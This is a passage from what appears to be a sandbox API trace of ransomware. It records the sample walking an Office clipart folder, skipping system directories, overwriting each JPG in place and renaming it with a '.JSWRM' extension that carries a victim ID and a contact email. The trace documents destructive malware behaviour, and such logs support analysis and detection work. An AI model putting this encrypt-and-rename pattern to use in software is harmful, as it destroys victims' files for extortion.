lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145895.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145895.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0083.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0083.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145895.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145895.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145895.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0083.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0083.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0083.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0083.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.113] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33958) returned 1 [0083.114] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x84a0) returned 0x24d210 [0083.114] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x84a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x84a0, lpOverlapped=0x0) returned 1 [0083.118] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.118] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x84a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x84a0, lpOverlapped=0x0) returned 1 [0083.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.119] CloseHandle (hObject=0x314) returned 1 [0083.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0083.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0083.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0083.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0083.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0083.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0083.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.120] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145895.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145895.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0083.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0083.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0083.121] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9a76, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145904.JPG", cAlternateFileName="")) returned 1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2=".") returned 1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="..") returned 1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="...") returned 1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="windows") returned -1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="recovery") returned -1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="perflogs") returned -1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="documents and settings") returned 1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="system volume information") returned -1 [0083.121] lstrcmpiW (lpString1="J0145904.JPG", lpString2="msocache") returned -1 [0083.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0083.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145904.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145904.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145904.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0083.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145904.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145904.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145904.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0083.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0083.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0083.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.122] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39542) returned 1 [0083.122] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9a70) returned 0x24d210 [0083.122] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9a70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9a70, lpOverlapped=0x0) returned 1 [0083.127] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.127] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9a70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9a70, lpOverlapped=0x0) returned 1 [0083.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.128] CloseHandle (hObject=0x314) returned 1 [0083.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0083.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0083.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0083.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0083.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0083.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0083.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.128] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145904.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145904.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0083.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0083.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0083.129] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb5ac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0146142.JPG", cAlternateFileName="")) returned 1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2=".") returned 1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="..") returned 1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="...") returned 1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="windows") returned -1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="recovery") returned -1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="perflogs") returned -1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="documents and settings") returned 1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="system volume information") returned -1 [0083.129] lstrcmpiW (lpString1="J0146142.JPG", lpString2="msocache") returned -1 [0083.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0083.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0146142.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0146142.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0146142.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0083.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0083.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0146142.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0146142.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0146142.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0083.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0083.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0083.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0083.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.130] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46508) returned 1 [0083.130] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb5a0) returned 0x24d210 [0083.131] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb5a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb5a0, lpOverlapped=0x0) returned 1 [0083.136] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.136] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb5a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb5a0, lpOverlapped=0x0) returned 1 [0083.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.137] CloseHandle (hObject=0x314) returned 1 [0083.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0083.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0083.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0083.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0083.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0083.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0083.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0083.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0083.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0083.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0083.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0083.138] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe81b154, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe81b154, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaa9a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0148309.JPG", cAlternateFileName="")) returned 1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2=".") returned 1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="..") returned 1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="...") returned 1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="windows") returned -1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="recovery") returned -1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="perflogs") returned -1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="documents and settings") returned 1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="system volume information") returned -1 [0083.138] lstrcmpiW (lpString1="J0148309.JPG", lpString2="msocache") returned -1 [0083.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0083.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148309.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148309.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0148309.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0083.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0083.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148309.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148309.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0148309.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0083.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0083.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0083.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0083.138] CreateFileW 